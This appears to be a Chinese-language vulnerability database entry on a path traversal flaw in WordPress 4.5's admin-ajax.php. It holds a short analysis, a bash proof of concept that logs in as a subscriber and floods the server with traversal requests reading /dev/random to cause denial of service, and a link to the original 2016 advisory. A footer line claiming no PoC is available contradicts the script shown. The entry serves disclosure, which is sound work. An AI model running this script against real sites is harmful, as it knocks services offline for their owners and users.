WordPress 4.5 admin-ajax.php Path...

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 影响版本 WordPress < 4.6 (4.5.3测试通过) #### 分析 ![代码分析图](https://images.seebug.org/contribute/73e220db-8d92-4d48-921c-00d39f8e5835) 上面代码可以看出,目录穿越漏洞触发在安全检查之前。 没有回显略鸡肋,不过攻击者可利用该目录穿越重复读取`/dev/random`阻塞php脚本,造成DoS。 PoC ``` #!/bin/bash target="http://<target>" username="subscriber" password="password" cookiejar=$(mktemp) # login curl --cookie-jar "$cookiejar" \ --data "log=$username&pwd=$password&wp-submit=Log+In&redirect_to=%2f&testcookie=1" \ "$target/wp-login.php" \ >/dev/null 2>&1 # exhaust apache for i in `seq 1 1000` do curl --cookie "$cookiejar" \ --data "plugin=../../../../../../../../../../dev/random&action=update-plugin" \ "$target/wp-admin/admin-ajax.php" \ >/dev/null 2>&1 & done rm "$cookiejar" ``` ### 原文 https://sumofpwn.nl/advisory/2016/path_traversal_vulnerability_in_wordpress_core_ajax_handlers.html

0%
暂无可用Exp或PoC
当前有0条受影响产品信息